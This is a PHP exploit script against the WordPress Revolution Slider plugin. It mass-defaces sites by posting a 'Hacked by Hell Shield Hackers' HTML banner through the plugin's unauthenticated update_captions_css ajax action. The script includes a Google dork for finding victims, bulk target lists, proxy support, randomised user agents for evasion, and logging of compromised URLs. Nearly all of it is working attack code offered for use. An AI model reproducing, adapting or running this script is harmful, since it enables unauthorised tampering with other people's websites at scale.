Revslider exploit

<?php

# This tool does not exploit Index.php
# Google DORK: inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
# Dont think yourself leet by using this script
# Changing name wont make u leet
# Exemples target:
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
$op_ = getopt('f:t:', array('help::'));
echo "Revslider exploit - in73ct0r d3vil ";
$menu = "
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
                  php exploit.php -t target
                  php exploit.php -f targets
                  php exploit.php -t target -p 'http://localhost:9090'
\n";
echo isset($op_['help']) ? exit($menu) : NULL;
$params = array(
    'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL,
    'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL,
    'proxy' => not_isnull_empty($op_['p']) ? $op_['p'] : NULL,
    'deface' => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>[ Hacked by Hell Shield Hackers ]<br><marque>in73ct0r d3vil was here<p style='color: transparent'>",
    'line' => "--------------------------------------------------------------"
);
not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
not_isnull_empty($params['target']) ? __request($params) . exit() : NULL;
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;
function not_isnull_empty($valor = NULL) {
    RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}
function __plus() {
    ob_flush();
    flush();
}
function __listTarget($file) {
    $tgt_  = array_unique(array_filter(explode("\n", file_get_contents($file['file']))));
    echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n";
    foreach ($tgt_ as $url) {
        echo "\n[+] [INFO] SCANNING : {$url} \n";
        __plus();
        $file['target'] = $url;
        __request($file) . __plus();
    }
}
function __setUserAgentRandom() {
    $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox',
        'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror', 'Netscape', 'Chrome', 'Dragon', 'SeaMonkey', 'Maxthon', 'IBrowse'
    );
    $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD',
        'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix',
        'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android', 'iPhone', 'Windows NT 6.1', 'BeOS', 'OS 10.5', 'Nokia', 'Arch Linux',
        'Ark Linux', 'BitLinux', 'Conectiva (Mandriva)', 'CRUX Linux', 'Damn Small Linux', 'DeLi Linux', 'Ubuntu', 'BigLinux', 'Edubuntu'
    );
    $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO',
        'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar',
        'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK', 'zh_SG', 'zh_TW', 'zh', 'hr_HR', 'hr', 'cs_CZ', 'cs',
        'da_DK', 'da', 'nl_BE', 'nl_NL', 'nl', 'en_AU', 'en_CA', 'en_IN', 'en_IE', 'en_MT', 'en_NZ', 'en_PH', 'en_SG', 'en_ZA',
        'en_GB', 'en_US', 'en', 'et_EE', 'et', 'fi_FI', 'fi', 'fr_BE', 'fr_CA', 'fr_FR', 'fr_LU', 'fr_CH', 'fr', 'de_AT', 'de_DE'
    );
    return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)';
}
function __request($__) {
    $curlxpl = curl_init();
    curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
    (!is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL);
    curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
    curl_setopt($curlxpl, CURLOPT_POST, 1);
    curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action","client_action" => "update_captions_css", "data" => $__['deface']));
    curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
    curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
    $result = curl_exec($curlxpl) . __plus();
    if (eregi('true', $result)) {
        $h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
        echo "[!] [INFO] Success Exploit!\n";
        echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
        __plus();
        file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
    } else {
        echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
    }
    curl_close($curlxpl);
    unset($curlxpl);
}